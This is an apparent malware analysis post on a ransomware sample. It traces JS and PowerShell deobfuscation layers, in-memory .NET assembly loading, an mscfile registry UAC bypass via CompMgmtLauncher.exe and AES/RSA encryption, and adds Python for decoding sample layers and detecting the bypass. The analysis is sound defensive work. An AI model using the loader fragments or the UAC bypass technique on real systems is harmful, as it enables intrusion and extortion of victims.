RANSOMWARE VIA ASSEMBLIES

SUMMARY:


This document analyses the multiple layers of obfuscation used by the ransomware.

THE ENTRY POINT

In this case a JS file is the entry point. It is a heavily obfuscated file with a lot of garbage code.


The JS file talks to multiple IP addresses, most probably compromised domains.

The JS file puts together a .tmp file whose contents are delimited by '!'.

Next, the payload runs PowerShell to build the next-stage payload:

    ([System.IO.File]::ReadAllText('C:\Users\foo\jbsvpi.tmp')).Replace('!','')

On de-obfuscation we get the following (not all text is included):

Start-Sleep -s 32; [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("..."))

The above payload is de-obfuscated to the following.

$EnCoFi = @'
...
'@

We are not quite there yet, so bear with me. This string is decoded by

    New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EnCoFi), [IO.Compression.CompressionMode]::Decompress)

It operates on a byte array of 700928 bytes.

Let's continue decoding this layer (System.IO.Compression.DeflateStream). Now we get the following, which means we still have more to decode :)

77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 128 0 0 0 14 31 186 14 0 180 9 205 33 184 1 76 205 33 84 104 105 115 32 112 114 111 103 114 97 109 32 99 97 110 110 111 116 32 98 101 32 114 117 110 32 105 110 32 68 79 83 32 109 111 100 101 46 13 13 10 36 0 0 0 0 0 0 0 80 69 0 0 76 1 3 0 35 222 218 92 0 0 0 0 0 0 0 0 224 0 2 33 11 1 11 0 0 170 10 0 0 6 0 0 0 0 0 0 254 200 10 0 0 32 0 0 0 224 10 0 0 0 0 16 0 32 0 0 0 2 0 0 4 0 0 0 0 0 0 0 4 ...

We can clearly see that there are far too many levels of obfuscation, but it's getting easier now. All we have to do with the above payload is take the character representation of each integer value (the first two, 77 90, are 'MZ'). After decoding we get a DLL. In the .NET world, code is compiled to IL and packaged as an executable, a DLL or, more generally, an assembly. At load time the runtime creates a stub for each class; eventually the stub passes its address to the JIT compiler, which compiles everything to machine code. The assembly is the basic packaging unit in .NET; an assembly can be an EXE, a DLL, a single file or a multi-file assembly.

So we have a DLL / assembly that is loaded by PowerShell.
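To reproduce the last two layers offline, here is an added example (not the page's or the malware's code): it reverses the Base64 + DeflateStream layer described above, turns the decimal dump into bytes, and reads the PE headers to confirm that what PowerShell loads is a 32-bit .NET DLL. The PE image and the packed strings are constructed samples whose header values (i386, 3 sections, characteristics 0x2102) mirror what the page's dump shows; Python stands in for the analyst's tooling.

```python
import base64
import struct
import zlib

def build_sample_pe() -> bytes:
    """Constructed stand-in for the decoded DLL: a minimal PE32 image with a CLR header directory."""
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)                        # e_lfanew: PE header at 0x80
    dos[0x4E:0x4E + 39] = b"This program cannot be run in DOS mode."
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 3, 0, 0, 0, 0xE0, 0x2102)  # i386, 3 sections, DLL
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<I", opt, 0x5C, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 0x60 + 14 * 8, 0x2008, 0x48)      # directory 14: CLR runtime header
    return bytes(dos + coff + opt)

def pack_like_stage(pe: bytes) -> str:
    """Pack bytes the way the $EnCoFi layer is packed (raw Deflate, then Base64); used only to build the sample."""
    comp = zlib.compressobj(wbits=-15)
    return base64.b64encode(comp.compress(pe) + comp.flush()).decode()

def unwrap_deflate_b64(b64: str) -> bytes:
    """Reverse FromBase64String + DeflateStream(Decompress). DeflateStream is raw deflate, hence wbits=-15."""
    return zlib.decompress(base64.b64decode(b64), -15)

def ints_to_bytes(dump: str) -> bytes:
    """The '77 90 144 0 ...' layer: one decimal per byte, i.e. the 'character representation' of each value."""
    return bytes(int(tok) for tok in dump.split())

def inspect_pe(data: bytes) -> dict:
    """Read just enough of the headers to say what PowerShell loaded: PE32/PE32+, machine, DLL flag, CLR header."""
    if data[:2] != b"MZ":
        return {"is_pe": False}
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return {"is_pe": False}
    machine, nsec, _, _, _, _, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt)[0]
    dir_base = opt + (0x60 if magic == 0x10B else 0x70)           # data directories start: PE32 vs PE32+
    ndirs = struct.unpack_from("<I", data, dir_base - 4)[0]
    clr_rva, clr_size = struct.unpack_from("<II", data, dir_base + 14 * 8) if ndirs > 14 else (0, 0)
    return {"is_pe": True, "pe32plus": magic == 0x20B, "machine": machine, "sections": nsec,
            "is_dll": bool(chars & 0x2000), "is_dotnet": clr_rva != 0 and clr_size != 0}

# Constructed sample data: the same image as the Deflate+Base64 layer and as the decimal-dump layer.
SAMPLE_B64 = pack_like_stage(build_sample_pe())
SAMPLE_DUMP = " ".join(str(b) for b in build_sample_pe())
```

DeflateStream writes a raw deflate stream with no zlib header, so a decoder expecting one fails on it; feed inspect_pe the complete decoded array, since the page's dump is truncated and only the MZ check works on it.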


   SHA256: 6de15bd033be912148962eef88b08e29d04f5272e2f454a350076d0c62c5e600

This DLL has a class called 'Test' and a method called Install1:

public static class Test { ...

It uses Test.MemoryLoadLibrary(BINARY STRING) to launch another assembly!

Here is the final DLL.


      SHA256: 03a256ec2af4355194f494a987358c0fa9e635987b8c7b8ec3731fba8e5e443a

LOADING ASSEMBLIES:

PowerShell uses [Test]::Install1() to load the assembly, where Test is the class name and Install1 is the method name.


AND THE FUN BEGINS:

The payload drops a .bmp image:

       SHA256: 34cbe464ded497a11d48817b07bf0c86cafb7f331c96c712e80663aa8afd7904

BYPASSING UAC:

The payload queries the registry using the following functions:

    RegQueryValueExA
    RegOpenKeyExA

It looks for:

    Software\\Classes\\mscfile\\shell\\open\\command\\

After making its modifications it uses ShellExecuteExA() to launch


    C:\Windows\System32\CompMgmtLauncher.exe


It then uses CheckTokenMembership() to check the access token.

PAYLOAD EXECUTES THE FOLLOWING COMMANDS:

CompMgmtLauncher (Computer Management Snap-in Launcher) loads third-party DLLs if they are registered under the registry location SOFTWARE\Classes -> shellex.

I am guessing this would work on Windows builds older than 15063.
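A detection for the registry-then-launcher sequence described above, added here and not part of the original analysis: it correlates a write to the per-user mscfile handler key with a subsequent CompMgmtLauncher.exe start by the same user, which is the pairing a defender would alert on. The event lines, user names and paths are constructed samples in a simplified Sysmon-like key=value format.

```python
import re
from datetime import datetime

# Constructed sample events (not from the page), in a simplified Sysmon-like key=value form:
# EventID 13 = registry value set, EventID 1 = process creation.
SAMPLE_EVENTS = [
    "2019-01-01T10:00:01Z EventID=13 User=LAB\\alice Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    " TargetObject=HKU\\S-1-5-21-1-2-3-1001\\Software\\Classes\\mscfile\\shell\\open\\command\\(Default)",
    "2019-01-01T10:00:03Z EventID=1 User=LAB\\alice Image=C:\\Windows\\System32\\CompMgmtLauncher.exe"
    " ParentImage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "2019-01-01T11:30:00Z EventID=1 User=LAB\\bob Image=C:\\Windows\\System32\\CompMgmtLauncher.exe"
    " ParentImage=C:\\Windows\\explorer.exe",
]

# The per-user handler key the payload rewrites; a write here is rare in normal operation.
HIJACK_KEY = re.compile(r"\\software\\classes\\mscfile\\shell\\open\\command", re.IGNORECASE)
LAUNCHER = "compmgmtlauncher.exe"

def parse_event(line: str) -> dict:
    """Split '<timestamp> key=value ...' into a dict; values contain no spaces in this sample format."""
    ts, rest = line.split(" ", 1)
    fields = dict(re.findall(r"(\w+)=(\S+)", rest))
    fields["ts"] = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
    return fields

def detect_mscfile_hijack(lines, window_s: int = 600) -> list:
    """Alert when CompMgmtLauncher.exe starts for a user who wrote the mscfile handler key within window_s before."""
    last_write = {}  # user -> (time of key write, image that wrote it)
    alerts = []
    for ev in map(parse_event, lines):
        user = ev.get("User", "?")
        if ev.get("EventID") == "13" and HIJACK_KEY.search(ev.get("TargetObject", "")):
            last_write[user] = (ev["ts"], ev.get("Image", "?"))
        elif ev.get("EventID") == "1" and ev.get("Image", "").lower().endswith(LAUNCHER):
            hit = last_write.get(user)
            if hit and 0 <= (ev["ts"] - hit[0]).total_seconds() <= window_s:
                alerts.append({"user": user, "key_writer": hit[1],
                               "launcher_parent": ev.get("ParentImage", "?"), "at": ev["ts"].isoformat()})
    return alerts
```

The launcher start on its own is normal administrator activity (bob's line), so the alert fires only when the handler key was written shortly before it; the writing image (here PowerShell) is carried into the alert for triage.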

FILE ENCRYPTION:

File encryption continues from PowerShell's address space. Files are encrypted with AES-256 and the AES keys are encrypted with RSA (public key); the victim buys the private key from the hacker. Encrypted files are given the .1y0pw7 extension. The wallpaper is changed to

RANSOM NOTE:

I am not sure why the note starts by saying "Welcome again". Maybe the hacker is in the habit of compromising victim(s) more than once.

LET'S LOOK AT THE OVERALL FLOW

CONCLUSION:

It's clear that the hackers are getting smarter by the day. They are using legitimate tools that can bypass multiple security layers. I am sure they QA their work as well. Most of the attacks are staged through multiple layers of obfuscation. Payloads can be loaded as assemblies using tools like PowerShell, which means the actual payload EXE runs in PowerShell's address space. I am not sure if AV vendors can do much against such attacks.

    STAY AWAY FROM RANSOMWARE